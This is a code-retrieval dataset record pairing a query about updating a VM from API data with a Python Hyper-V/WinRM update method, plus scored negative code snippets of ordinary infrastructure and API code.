[ "0.7191567", "0.6846686", "0.6839081", "0.66729146", "0.66401607", "0.66307336", "0.6543804", "0.64999104", "0.6479456", "0.64707613", "0.64707613", "0.64252007", "0.6379528", "0.6327033", "0.6313674", "0.62806183", "0.6274699", "0.62721395", "0.62186", "0.621285", "0.62122226", "0.6168085", "0.61414564", "0.6110584", "0.61038285", "0.60985833", "0.6068215", "0.6067375", "0.60637105", "0.6054346", "0.6046684", "0.6045369", "0.60373455", "0.60364765", "0.6030536", "0.60212356", "0.6020641", "0.6018956", "0.6018956", "0.6017395", "0.6012652", "0.59986097", "0.59659404", "0.59653616", "0.5945764", "0.5910399", "0.5901793", "0.58859277", "0.5873071", "0.58709514", "0.5865081", "0.586231", "0.586142", "0.58475876", "0.5837965", "0.58368975", "0.5832483", "0.58322847", "0.58293295", "0.5821568", "0.5821568", "0.58117783", "0.5805629", "0.58029586", "0.57919645", "0.578519", "0.57818097", "0.577931", "0.577931", "0.577931", "0.577931", "0.577931", "0.577931", "0.5772513", "0.5771351", "0.5762677", "0.5762377", "0.5759899", "0.5759376", "0.57542336", "0.575188", "0.5750934", "0.574348", "0.5733125", "0.5725755", "0.57234293", "0.5717563", "0.5716741", "0.5707753", "0.5705537", "0.56865406", "0.56835026", "0.56801933", "0.56776136", "0.56711656", "0.56656677", "0.56603986", "0.5659439", "0.56586677", "0.5656963", "0.56567687" ]
0.0
-1
Commence the update of a vm using the data read from the API
def update(vm_data: Dict[str, Any], span: Span) -> bool: vm_id = vm_data['id'] # Generate the necessary template data child_span = opentracing.tracer.start_span('generate_template_data', child_of=span) template_data = Windows._get_template_data(vm_data, child_span) child_span.finish() # Check that the data was successfully generated if template_data is None: error = f'Failed to retrieve template data for VM #{vm_id}.' Windows.logger.error(error) vm_data['errors'].append(error) span.set_tag('failed_reason', 'template_data_failed') return False # Check that all of the necessary keys are present if not all(template_data[key] is not None for key in Windows.template_keys): missing_keys = [ f'"{key}"' for key in Windows.template_keys if template_data[key] is None ] error_msg = f'Template Data Error, the following keys were missing from the VM update data: ' \ f'{", ".join(missing_keys)}.' Windows.logger.error(error_msg) vm_data['errors'].append(error_msg) span.set_tag('failed_reason', 'template_data_keys_missing') return False # If everything is okay, commence updating the VM host_name = template_data.pop('host_name') # Render the update command child_span = opentracing.tracer.start_span('generate_command', child_of=span) cmd = utils.JINJA_ENV.get_template('vm/hyperv/commands/update.j2').render(**template_data) child_span.finish() # Open a client and run the two necessary commands on the host updated = False try: child_span = opentracing.tracer.start_span('update_vm', child_of=span) response = Windows.deploy(cmd, host_name, child_span) span.set_tag('host', host_name) child_span.finish() except WinRMError as err: error = f'Exception occurred while attempting to update VM #{vm_id} on {host_name}.' Windows.logger.error(error, exc_info=True) vm_data['errors'].append(f'{error} Error: {err}') span.set_tag('failed_reason', 'winrm_error') else: # Check the stdout and stderr for messages if response.std_out: msg = response.std_out.strip() Windows.logger.debug(f'VM update command for VM #{vm_id} generated stdout\n{msg}') updated = 'VM Successfully Updated' in msg # Check if the error was parsed to ensure we're not logging invalid std_err output if response.std_err and '#< CLIXML\r\n' not in response.std_err: msg = response.std_err.strip() Windows.logger.error(f'VM update command for VM #{vm_id} generated stderr\n{msg}') # Check if we need to restart the VM as well if template_data['restart']: # Also render and deploy the restart_cmd template restart_cmd = utils.JINJA_ENV.get_template('vm/hyperv/commands/restart.j2').render(**template_data) # Attempt to execute the restart command Windows.logger.debug(f'Executing restart command for VM #{vm_id}') child_span = opentracing.tracer.start_span('restart_vm', child_of=span) response = Windows.deploy(restart_cmd, host_name, child_span) child_span.finish() if response.std_out: msg = response.std_out.strip() Windows.logger.debug(f'VM restart command for VM #{vm_id} generated stdout\n{msg}') # Check if the error was parsed to ensure we're not logging invalid std_err output if response.std_err and '#< CLIXML\r\n' not in response.std_err: msg = response.std_err.strip() error = f'VM restart command for VM #{vm_id} generated stderr\n{msg}' vm_data['errors'].append(error) Windows.logger.error(error) return updated
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def update():\n return 'update api in put'", "def update(self, params):", "def _update_from_rest_data(self) -> None:", "def vm_update(args):\n ip1 = args.ip1\n flavor = args.flavor\n numcpus = args.numcpus\n memory = args.memory\n plan = args.plan\n autostart = args.autostart\n noautostart = args.noautostart\n dns = args.dns\n host = args.host\n domain = args.domain\n cloudinit = args.cloudinit\n template = args.template\n net = args.network\n information = args.information\n iso = args.iso\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n names = [common.get_lastvm(config.client)] if not args.names else args.names\n for name in names:\n if dns:\n common.pprint(\"Creating Dns entry for %s...\" % name)\n if net is not None:\n nets = [net]\n else:\n nets = k.vm_ports(name)\n if nets and domain is None:\n domain = nets[0]\n if not nets:\n return\n else:\n k.reserve_dns(name=name, nets=nets, domain=domain, ip=ip1)\n elif ip1 is not None:\n common.pprint(\"Updating ip of vm %s to %s...\" % (name, ip1))\n k.update_metadata(name, 'ip', ip1)\n elif cloudinit:\n common.pprint(\"Removing cloudinit information of vm %s\" % name)\n k.remove_cloudinit(name)\n return\n elif plan is not None:\n common.pprint(\"Updating plan of vm %s to %s...\" % (name, plan))\n k.update_metadata(name, 'plan', plan)\n elif template is not None:\n common.pprint(\"Updating template of vm %s to %s...\" % (name, template))\n k.update_metadata(name, 'template', template)\n elif memory is not None:\n common.pprint(\"Updating memory of vm %s to %s...\" % (name, memory))\n k.update_memory(name, memory)\n elif numcpus is not None:\n common.pprint(\"Updating numcpus of vm %s to %s...\" % (name, numcpus))\n k.update_cpus(name, numcpus)\n elif autostart:\n common.pprint(\"Setting autostart for vm %s...\" % name)\n k.update_start(name, start=True)\n elif noautostart:\n common.pprint(\"Removing autostart for vm %s...\" % name)\n k.update_start(name, start=False)\n elif information:\n common.pprint(\"Setting information for vm %s...\" % name)\n k.update_descrmation(name, information)\n elif iso is not None:\n common.pprint(\"Switching iso for vm %s to %s...\" % (name, iso))\n k.update_iso(name, iso)\n elif flavor is not None:\n common.pprint(\"Updating flavor of vm %s to %s...\" % (name, flavor))\n k.update_flavor(name, flavor)\n elif host:\n common.pprint(\"Creating Host entry for vm %s...\" % name)\n nets = k.vm_ports(name)\n if not nets:\n return\n if domain is None:\n domain = nets[0]\n k.reserve_host(name, nets, domain)", "def update( ):\r\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update():", "def update():", "async def update(self):\n\t\tstate = await self._client.get_state('command.cgi?cmd=getObject&oid={0}&ot={1}'.format(self._oid,self._ot))\n\t\tif state is not None:\n\t\t\tself._raw_result = state", "def update_data():\n pass", "def test_update_vip(self):\r\n resource = 'vip'\r\n cmd = vip.UpdateVip(test_cli20.MyApp(sys.stdout), None)\r\n self._test_update_resource(resource, cmd, 'myid',\r\n ['myid', '--name', 'myname',\r\n '--tags', 'a', 'b'],\r\n {'name': 'myname', 'tags': ['a', 'b'], })", "def test_full_update_vehicle(self):\n vehicle = sample_vehicle(self.user)\n\n payload = {\n 'type': 'VSL',\n 'license_plate': 'BB-123-BB'\n }\n url = detail_url(vehicle.id)\n\n self.client.put(url, payload)\n\n vehicle.refresh_from_db()\n\n self.assertEqual(vehicle.type, payload['type'])\n self.assertEqual(vehicle.license_plate, payload['license_plate'])", "def Update(self, controller):\n pass", "def test_update_vip(self):\n resource = 'vip'\n cmd = vip.UpdateVip(test_cli20.MyApp(sys.stdout), None)\n self._test_update_resource(resource, cmd, 'myid',\n ['myid', '--name', 'myname',\n '--tags', 'a', 'b'],\n {'name': 'myname', 'tags': ['a', 'b'], })", "def update(self, *args, **kwargs):", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self, *args, **kwargs):\n pass", "def update(self):\n _LOGGER.debug(\"update called.\")\n try:\n # Get our Authentication Token from SEMS Portal API\n _LOGGER.debug(\"SEMS - Getting API token\")\n\n # Prepare Login Headers to retrieve Authentication Token\n login_headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json',\n 'token': '{\"version\":\"v2.1.0\",\"client\":\"ios\",\"language\":\"en\"}',\n }\n\n # Prepare Login Data to retrieve Authentication Token\n login_data = '{\"account\":\"'+self._config.get(CONF_USERNAME)+'\",\"pwd\":\"'+self._config.get(CONF_PASSWORD)+'\"}'\n\n # Make POST request to retrieve Authentication Token from SEMS API\n login_response = requests.post(_URL, headers=login_headers, data=login_data, timeout=_RequestTimeout)\n\n # Process response as JSON\n jsonResponse = json.loads(login_response.text)\n\n # Get all the details from our response, needed to make the next POST request (the one that really fetches the data)\n requestTimestamp = jsonResponse[\"data\"][\"timestamp\"]\n requestUID = jsonResponse[\"data\"][\"uid\"]\n requestToken = jsonResponse[\"data\"][\"token\"]\n\n _LOGGER.debug(\"SEMS - API Token recieved: \"+ requestToken)\n # Get the status of our SEMS Power Station\n _LOGGER.debug(\"SEMS - Making Power Station Status API Call\")\n\n # Prepare Power Station status Headers\n headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json',\n 'token': '{\"version\":\"v2.1.0\",\"client\":\"ios\",\"language\":\"en\",\"timestamp\":\"'+str(requestTimestamp)+'\",\"uid\":\"'+requestUID+'\",\"token\":\"'+requestToken+'\"}',\n }\n\n data = '{\"powerStationId\":\"'+self._config.get(CONF_STATION_ID)+'\"}' \n\n response = requests.post(_PowerStationURL, headers=headers, data=data, timeout=_RequestTimeout)\n\n # Process response as JSON\n jsonResponseFinal = json.loads(response.text)\n\n _LOGGER.debug(\"REST Response Recieved\")\n\n for key, value in jsonResponseFinal[\"data\"][\"inverter\"][0][\"invert_full\"].items():\n if(key is not None and value is not None):\n self._attributes[key] = value\n _LOGGER.debug(\"Updated attribute %s: %s\", key, value)\n except Exception as exception:\n _LOGGER.error(\n \"Unable to fetch data from SEMS. %s\", exception)", "def update_vm_result(self, context, msg):\n args = jsonutils.loads(msg)\n agent = context.get('agent')\n port_id = args.get('port_uuid')\n result = args.get('result')\n LOG.debug('update_vm_result received from %(agent)s: '\n '%(port_id)s %(result)s', {'agent': agent,\n 'port_id': port_id,\n 'result': result})\n\n # Add the request into queue for processing.\n event_type = 'agent.vm_result.update'\n payload = {'port_id': port_id, 'result': result}\n timestamp = time.ctime()\n data = (event_type, payload)\n # TODO(nlahouti) use value defined in constants\n pri = self.obj.PRI_LOW_START + 10\n self.obj.pqueue.put((pri, timestamp, data))\n LOG.debug('Added request vm result update into queue.')\n\n return 0", "def on_post(self, req, resp):\n data = req.context['doc']\n user = req.context['token']\n vm_id = data['vm_id']\n\n try:\n log.info(\"Attempt to start VM [{}] for user [{}]..\".format(vm_id, user))\n xapi.current_session().start_vm(vm_id)\n except XapiOperationError as xoe:\n # starting a running VM, log and ignore\n log.info(xoe)\n\n info = xapi.current_session().get_vm_info(vm_id)\n log.info(\"Retrieved info of VM [{}].\".format(vm_id))\n\n resp.status = falcon.HTTP_200\n resp.context['result'] = {\n vm_id: {\n 'rdp_ip': info['ip'],\n 'rdp_port': 3389\n }\n }", "def update(self, v_input):\n\n self.v = v_input", "def update(self) -> None:\n ...", "def update(self) -> None:\n dev_id = slugify(self.vehicle.name)\n\n if not self.vehicle.state.is_vehicle_tracking_enabled:\n _LOGGER.debug(\"Tracking is disabled for vehicle %s\", dev_id)\n return\n\n _LOGGER.debug(\"Updating %s\", dev_id)\n attrs = {\"vin\": self.vehicle.vin}\n self._see(\n dev_id=dev_id,\n host_name=self.vehicle.name,\n gps=self.vehicle.state.gps_position,\n attributes=attrs,\n icon=\"mdi:car\",\n )", "def update_virtual_machine(self, vm):\n self.update_cpu(vm)\n self.update_memory(vm)\n signals.vm_updated.send(self.__class__, vm=vm)", "def update(self, psvm, values):\n body = {'psvm': values}\n return self._update(\"/os-psvm/%s\" % base.getid(psvm),\n body,\n \"psvm\")", "def do_update(self, id, data):\n verrors = ValidationErrors()\n if not self.is_loaded():\n verrors.add('ipmi.update', f'{IPMIService.IPMI_DEV!r} could not be found')\n elif id not in self.channels():\n verrors.add('ipmi.update', f'IPMI channel number {id!r} not found')\n elif not data.get('dhcp'):\n for k in ['ipaddress', 'netmask', 'gateway']:\n if not data.get(k):\n verrors.add(f'ipmi_update.{k}', 'This field is required when dhcp is false.')\n verrors.check()\n\n def get_cmd(cmds):\n nonlocal id\n return ['ipmitool', 'lan', 'set', f'{id}'] + cmds\n\n rc = 0\n options = {'stdout': DEVNULL, 'stderr': DEVNULL}\n if data.get('dhcp'):\n rc |= run(get_cmd(id, ['dhcp']), **options).returncode\n else:\n rc |= run(get_cmd(['ipsrc', 'static']), **options).returncode\n rc |= run(get_cmd(['ipaddr', data['ipaddress']]), **options).returncode\n rc |= run(get_cmd(['netmask', data['netmask']]), **options).returncode\n rc |= run(get_cmd(['defgw', 'ipaddr', data['gateway']]), **options).returncode\n\n rc |= run(get_cmd(['vlan', 'id', f'{data.get(\"vlan\", \"off\")}']), **options).returncode\n\n rc |= run(get_cmd(['access', 'on']), **options).returncode\n rc |= run(get_cmd(['auth', 'USER', 'MD2,MD5']), **options).returncode\n rc |= run(get_cmd(['auth', 'OPERATOR', 'MD2,MD5']), **options).returncode\n rc |= run(get_cmd(['auth', 'ADMIN', 'MD2,MD5']), **options).returncode\n rc |= run(get_cmd(['auth', 'CALLBACK', 'MD2,MD5']), **options).returncode\n\n # Apparently tickling these ARP options can \"fail\" on certain hardware\n # which isn't fatal so we ignore returncode in this instance. See #15578.\n run(get_cmd(['arp', 'respond', 'on']), **options)\n run(get_cmd(['arp', 'generate', 'on']), **options)\n\n if passwd := data.get('password'):\n cp = run(get_cmd(['ipmitool', 'user', 'set', 'password', '2', passwd]), capture_output=True)\n if cp.returncode != 0:\n err = '\\n'.join(cp.stderr.decode().split('\\n'))\n raise CallError(f'Failed setting password: {err!r}')\n\n cp = run(['ipmitool', 'user', 'enable', '2'], capture_output=True)\n if cp.returncode != 0:\n err = '\\n'.join(cp.stderr.decode().split('\\n'))\n raise CallError(f'Failed enabling user: {err!r}')\n\n return rc", "def update(self):\n #self._switch.odlclient._request_json(self._path, method=\"put\", json={\n # \"flow\": self._odl_inventory()\n #})\n self.remove() # actually, remove only uses self.switch and self.id, so this removes the other entry as well.\n self.deploy()", "def test_aws_service_api_vm_command_put(self):\n pass", "def update(self, *args, **kw):\n pass", "def cmd_update(self):\n self.update_repository()\n results = self.results.getvalue()\n if results:\n print('---')\n print(results, end='')", "async def put(self):\r\n data = await self.request.json()\r\n agent_uuid = data[\"agent_uuid\"]\r\n ip_address = data[\"ip_address\"]\r\n agent_obj = Agent.filter(Agent.uuid == agent_uuid).first()\r\n if not agent_obj:\r\n response_obj = {\"status\": \"failed\"}\r\n logger.error(\"No agent found!!!\")\r\n return web.Response(text=str(response_obj), status=500)\r\n try:\r\n Agent.update(ip_address=ip_address).where(Agent.uuid == agent_uuid)\r\n logger.info(\"Agent updated!!!\")\r\n return web.Response(text=\"successful\", status=200)\r\n except Exception as ex:\r\n response_obj = {\"status\": \"failed\"}\r\n error_message = str(ex)\r\n logger.error(error_message)\r\n return web.Response(text=str(response_obj), status=500)", "def vm_result_update(self, payload):\n\n port_id = payload.get('port_id')\n result = payload.get('result')\n\n if port_id and result:\n # Update the VM's result field.\n params = dict(columns=dict(result=result))\n self.update_vm_db(port_id, **params)", "def test_ipam_vrfs_update(self):\n pass", "def update(self):\n\n\t\tif not self.complete:\n\t\t\tfor vasp_run in self.vasp_run_list:\n\t\t\t\tvasp_run.update()", "def _update(self, host):\n pass", "def update(self,data):\r\n data = data.split(':',1)\r\n\r\n self.log('Signal','Received an update: %s...' % repr(data)[0:10],'update')\r\n \r\n #print \"*** local: \" + repr(data)\r\n \r\n if data[0] == 'Results':\r\n\r\n self.log('Signal','The local node returned these passwords: %s' % repr(data[1]),'update')\r\n\r\n self.addResult(data[1])\r\n elif data[0] == 'Bench':\r\n self.log('Signal','The local node returned these benches: %s' % repr(data[1]),'update')\r\n \r\n self.addBench(data[1])\r\n\r\n elif data[0] == 'Work':\r\n if data[1] == 'Done':\r\n self.finished += 1\r\n if self.finished >= len(self.nodes):\r\n self.runningWork = False\r\n self.log('Signal','Finished working','update')\r\n\r\n notification = 'Work:Done'\r\n self.notifyObservers(notification)", "def update_controller(self):", "def update(self):\n self.__execute(self.pkgin_bin, \"update\")", "def _update(self, data):\n self.status = data['status']\n self.progress = data['progress']", "async def update(self) -> None:\n # pause logic\n if not self.running.is_set():\n self.add_to_output(\"Paused...\")\n await self.running.wait()\n\n # tell the user we are updating\n self.add_to_output(f\"Updating...\")\n # create ssh connection to miner\n try:\n conn = await self.get_connection(\"root\", \"admin\")\n # tell the user we are sending the update file\n self.add_to_output(\"Sending upgrade file...\")\n # send the update file\n await self.send_file(UPDATE_FILE_S9, \"/tmp/firmware.tar\")\n # install the update and collect the result\n result = await conn.run(f'sysupgrade /tmp/firmware.tar')\n self.add_to_output(result.stdout.strip())\n # tell the user the update completed\n self.add_to_output(f\"Update completed...\")\n except OSError:\n self.add_to_output(f\"Unknown error...\")", "def update(self, customerguid, name=\"\", login=\"\", password=\"\", email=\"\", address=\"\", vat=\"\", jobguid=\"\", executionparams=None):", "def update(self):\n\n pass", "def update(self):\n return self._process('update')", "def update(self):\n sess = u.get_default_session()\n # sess.run(self.update_op)\n u.run(self.update_op)", "def update(self, data):\n if self.service is not None:\n self.service.update_response(data)", "def update_data(update_method):\n log.debug('Starting update')\n cmd = ['/usr/bin/python', wf.workflowfile('update.py')]\n if update_method == 'force':\n cmd.append('--update')\n cmd.append('force')\n\n # Update projects data\n log.debug('Run update command : {}'.format(cmd))\n run_in_background('update', cmd)\n\n return 0", "def testUpdate(self):\n response = self.runPut(self.root, sequencer=self.hiseq2000.sodar_uuid, data=self.post_data)\n self.response_200(response)\n data = json.loads(response.content.decode(\"utf-8\"))\n self.assertEqual(data[\"vendor_id\"], self.post_data[\"vendor_id\"])", "def put(self, id):\n context = request.environ.get('context')\n obj = dbapi.netdevice_data_update(context, id, request.json)\n resp = {\"data\": jsonutils.to_primitive(obj.variables)}\n return resp, 200, None", "def update(self) -> None:\n\n try:\n request = requests.get(self.url, timeout=10)\n except requests.exceptions.RequestException as err:\n _LOGGER.error(\"No connection to endpoint: %s\", err)\n else:\n doc = xmltodict.parse(request.text)\n mtus = int(doc[\"LiveData\"][\"System\"][\"NumberMTU\"])\n\n for mtu in range(1, mtus + 1):\n power = int(doc[\"LiveData\"][\"Power\"][\"MTU%d\" % mtu][\"PowerNow\"])\n voltage = int(doc[\"LiveData\"][\"Voltage\"][\"MTU%d\" % mtu][\"VoltageNow\"])\n\n self.data[mtu] = {\n UnitOfPower.WATT: power,\n UnitOfElectricPotential.VOLT: voltage / 10,\n }", "def update_put():\n try:\n update.launcher.start_async()\n except update.launcher.AlreadyInProgressError:\n # If an update is already in progress, treat it as success.\n pass\n except update.launcher.Error as e:\n return json_response.error(str(e)), 200\n return json_response.success()", "def handle_wps_update(self, data):\n\n self.jobs = data", "def update_vm(client, resource_group_name, vm_name, **kwargs):\n return client.update(resource_group_name, vm_name, kwargs['parameters'].tags)", "def update(self, **options):\n pass", "def remote_Update(self, data):\r\n\t\t# server doesn't need to know if this fails\r\n\t\t# the server should be infallable, so the problem is in the client\r\n\t\ttry:\r\n\t\t\treturn self.onUpdate(data)\r\n\t\texcept Exception, e:\t# the client might be out of date\r\n\t\t\tlog.err(\"Unable to handle data: %s\" % data)\r\n\t\t\tlog.err(e)", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def update(self):\n pass", "def test_aws_service_api_vm_patch(self):\n pass", "def update(*args):", "def update(self) -> None:\n pass", "def update(self) -> None:\n pass", "def post_virtual_machine_update(self, resource_id, resource_dict):\n pass", "def update(self):\n self.attributes = self.call('UPDATE', expect=error.OK, body=self.attributes)", "def refresh_vm(context, vm):\n vapp = vm.getVirtualAppliance()\n return vapp.getVirtualMachine(vm.getId())", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, data):\n return data", "def __send_update(self):\n\n offset = self.app_id * 10\n\n # TODO set number of leading zero depending on max value\n print(\"Update run {}: {} {}/{} with {}S - {}F - {}B\".format(self.app_id,\n self.test_run.date,\n self.test_run.actual,\n self.test_run.total,\n self.test_run.succeed,\n self.test_run.failed,\n self.test_run.blocked))\n\n status_dict = {}\n # Test run advance status string\n status_dict[offset + self.PIN_STATUS_TEXT] = \"{}/{}\".format(self.test_run.actual,\n self.test_run.total)\n # Test run advance status percent\n percent = self.test_run.actual / self.test_run.total * 100\n status_dict[offset + self.PIN_STATUS_GRAPH] = percent\n # Test run result type number\n status_dict[offset + self.PIN_TYPES] = \"S{} F{} B{}\".format(self.test_run.succeed,\n self.test_run.failed,\n self.test_run.blocked)\n # Test run led TODO manage color\n status_dict[offset + self.PIN_LED] = 255\n\n self.post_dict(status_dict)", "def update(self):\n self._client.patch(self)", "def update_volumes():\n print 'do something useful here'", "def update(self):\r\n pass", "def update(self) -> None:\n pass", "def update(self):\n self.data_service.update()\n self._state = self.data_service.data.get(self._json_key)\n self._attributes = self.data_service.attributes.get(self._json_key)\n self._unit_of_measurement = self.data_service.unit", "def update(self):\n self.data_service.update()\n self._state = self.data_service.data.get(self._json_key)\n self._attributes = self.data_service.attributes.get(self._json_key)\n self._unit_of_measurement = self.data_service.unit", "def xnat_workflow_info_update(args):\n\trequest_url = \"http://\" + args.server + \"/data/services/workflows/workflowid/\" + args.workflow_id + \"?format=json\"\n\tprint(\"xnat_workflow_info update: request_url: \" + request_url)\n\tresponse = requests.get(request_url, auth=(args.username, args.password))\n\n\tjson_response = json.loads(response.text)\n\tjson_items = json_response['items']\n\tjson_item = json_items[0]\n\tjson_data_fields = json_item['data_fields']\n\n\tput_url = \"http://\" + args.server + \"/REST/workflows\"\n\n\t# workflow identifying information\n\tput_url += \"?wrk:workflowData/id=\" + json_data_fields['ID']\n \tput_url += \"&wrk:workflowData/pipeline_name=\" + json_data_fields['pipeline_name']\n\tput_url += \"&wrk:workflowData/launch_time=\" + json_data_fields['launch_time']\n\tput_url += \"&wrk:workflowData/data_type=\" + json_data_fields['data_type']\n\t# workflow information to be updated\n \tput_url += \"&wrk:workflowData/status=\" + \"In Progress\"\n \tput_url += \"&wrk:workflowData/current_step_id=\" + args.step_id\n\tput_url += \"&wrk:workflowData/step_description=\" + args.step_description\n\tput_url += \"&wrk:workflowData/percentageComplete=\" + args.percent_complete\n\tput_url += \"&wrk:workflowData/current_step_launch_time=\" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n\tput_url = put_url.replace(\" \", \"%20\");\n\n\tprint(\"xnat_workflow_info update: put_url: \" + put_url)\n\n\tresponse = requests.put(put_url, auth=(args.username, args.password))\n\tif (response.status_code != 200):\n\t\tprint(\"Cannot update workflow\")\n\t\tprint(\"response.status_code: \" + str(response.status_code))\n\n\txnat_workflow_info_show(args)", "def update_avm_device() -> None:\n _async_add_entities(avm_wrapper, async_add_entities, data_fritz)", "def test_partial_update_vehicle(self):\n vehicle = sample_vehicle(user=self.user)\n\n payload = {\n 'type': 'VSL'\n }\n url = detail_url(vehicle.id)\n self.client.patch(url, payload)\n\n vehicle.refresh_from_db()\n self.assertEqual(vehicle.type, payload['type'])", "def send_lsp_update(lsp_name, new_path):\n print(\"Updating \", lsp_name, \"on NorthStar Controller\")\n requs = requests.get(\n 'https://' + server_ip +\n ':8443/NorthStar/API/v1/tenant/1/topology/1/te-lsps/',\n headers=auth_header, verify=False)\n dump = json.dumps(requs.json())\n lsp_list = json.loads(dump)\n # Find target LSP to use lspIndex\n for lsp in lsp_list:\n if lsp['name'] == lsp_name:\n break\n # Fill only the required fields\n # ero = ero_input\n ero = []\n\n # Build new ERO Data\n\n print lsp\n for ip_address in new_path:\n hop = {\n \"topoObjectType\": \"ipv4\",\n \"address\": ip_address,\n # \"loose\" : True,\n }\n ero.append(hop)\n new_lsp = {}\n# \"provisioningType\":\"SR\"\n for key in ('from', 'to', 'name', 'lspIndex', 'pathType', 'provisioningType'):\n new_lsp[key] = lsp[key]\n\n new_lsp['plannedProperties'] = {\n \"bandwidth\": \"100M\",\n 'ero': ero\n # 'calculatedEro' : []\n #'preferredEro' : ero\n }\n response = requests.put(\n 'https://10.10.2.64:8443/NorthStar/API/v1/tenant/1/topology/1/te-lsps/' + str(new_lsp[\n 'lspIndex']),\n json=new_lsp, headers=auth_header, verify=False)\n print(\"LSP Updated on NorthStar Controller\")\n print response", "async def async_update(self):", "def update(self, args):\n pass" ]
[ "0.67325056", "0.65831465", "0.64099467", "0.6401777", "0.6338021", "0.62686175", "0.62686175", "0.62686175", "0.62686175", "0.62159324", "0.62159324", "0.61146724", "0.61023915", "0.60943973", "0.6088066", "0.60478616", "0.60464793", "0.60435563", "0.6035188", "0.6035188", "0.6035188", "0.60291815", "0.602483", "0.6017324", "0.6012739", "0.5989964", "0.5985558", "0.59761703", "0.59746665", "0.5974125", "0.5969755", "0.5961766", "0.5947018", "0.59361064", "0.5925462", "0.5923477", "0.59228253", "0.5878553", "0.58629924", "0.5860692", "0.58544075", "0.5833168", "0.5814709", "0.5814363", "0.5800615", "0.580026", "0.5797017", "0.57926714", "0.57887155", "0.5786818", "0.5784597", "0.5780157", "0.5776485", "0.57550883", "0.57532424", "0.5748896", "0.5740837", "0.573285", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5720122", "0.5715519", "0.5710936", "0.571056", "0.571056", "0.5687538", "0.56801456", "0.5675466", "0.5672461", "0.5672461", "0.5672461", "0.5672461", "0.5672461", "0.5672461", "0.5665908", "0.5655419", "0.56540626", "0.5640595", "0.56328607", "0.5631472", "0.5629619", "0.5629619", "0.5624228", "0.56202", "0.5612361", "0.5600806", "0.55957955", "0.55931866" ]
0.6388902
4
Given the vm data from the API, create a dictionary that contains all of the necessary keys for the template The keys will be checked in the update method and not here, this method is only concerned with fetching the data that it can.
def _get_template_data(vm_data: Dict[str, Any], span: Span) -> Optional[Dict[str, Any]]: vm_id = vm_data['id'] Windows.logger.debug(f'Compiling template data for VM #{vm_id}') data: Dict[str, Any] = {key: None for key in Windows.template_keys} data['vm_identifier'] = f'{vm_data["project"]["id"]}_{vm_id}' # changes changes: Dict[str, Any] = { 'ram': False, 'cpu': False, 'storages': False, } updates = vm_data['history'][0] try: if updates['ram_quantity'] is not None: # RAM is needed in MB for the updater but we take it in in GB (1024, not 1000) changes['ram'] = vm_data['ram'] * 1024 except KeyError: pass try: if updates['cpu_quantity'] is not None: changes['cpu'] = vm_data['cpu'] except KeyError: pass # Fetch the drive information for the update try: if len(updates['storage_histories']) != 0: Windows.logger.debug(f'Fetching drives for VM #{vm_id}') child_span = opentracing.tracer.start_span('fetch_drive_updates', child_of=span) changes['storages'] = Windows.fetch_drive_updates(vm_data) child_span.finish() except KeyError: pass # Add changes to data data['changes'] = changes data['storage_type'] = vm_data['storage_type'] data['vms_path'] = settings.HYPERV_VMS_PATH # Get the host name of the server host_name = None for interface in vm_data['server_data']['interfaces']: if interface['enabled'] is True and interface['ip_address'] is not None: if IPAddress(str(interface['ip_address'])).version == 6: host_name = interface['hostname'] break if host_name is None: error = f'Host ip address not found for the server # {vm_data["server_id"]}.' Windows.logger.error(error) vm_data['errors'].append(error) return None # Add the host information to the data data['host_name'] = host_name # Determine restart data['restart'] = vm_data['restart'] return data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_template_data(vm_data: Dict[str, Any], span: Span) -> Optional[Dict[str, Any]]:\n vm_id = vm_data['id']\n Windows.logger.debug(f'Compiling template data for VM #{vm_id}')\n data: Dict[str, Any] = {key: None for key in Windows.template_keys}\n\n data['vm_identifier'] = f'{vm_data[\"project\"][\"id\"]}_{vm_id}'\n data['image_answer_file_name'] = vm_data['image']['answer_file_name']\n\n data['image_filename'] = vm_data['image']['filename']\n # check if file exists at /mnt/images/HyperV/VHDXs/\n path = '/mnt/images/HyperV/VHDXs/'\n child_span = opentracing.tracer.start_span('vm_image_file_download', child_of=span)\n if not Windows.check_image(data['image_filename'], path):\n # download the file\n downloaded, errors = Windows.download_image(data['image_filename'], path)\n if not downloaded:\n for error in errors:\n Windows.logger.error(error)\n vm_data['errors'].append(error)\n return None\n child_span.finish()\n\n # RAM is needed in MB for the builder but we take it in in GB (1024, not 1000)\n data['ram'] = vm_data['ram'] * 1024\n data['cpu'] = vm_data['cpu']\n data['dns'] = vm_data['dns']\n\n # Generate encrypted passwords\n data['admin_password'] = Windows._password_generator(size=12)\n # Also save the password back to the VM data dict\n vm_data['admin_password'] = data['admin_password']\n\n # Check for the primary storage\n if not any(storage['primary'] for storage in vm_data['storages']):\n error = 'No primary storage drive found. Expected one primary storage drive'\n Windows.logger.error(error)\n vm_data['errors'].append(error)\n return None\n\n data['storages'] = vm_data['storages']\n data['storage_type'] = vm_data['storage_type']\n\n # Get the Networking details\n data['vlans'] = []\n data['ip_addresses'] = []\n data['default_ips'] = []\n data['default_gateway'] = ''\n data['default_netmask_int'] = ''\n data['default_vlan'] = ''\n\n # The private IPs for the VM will be the one we need to 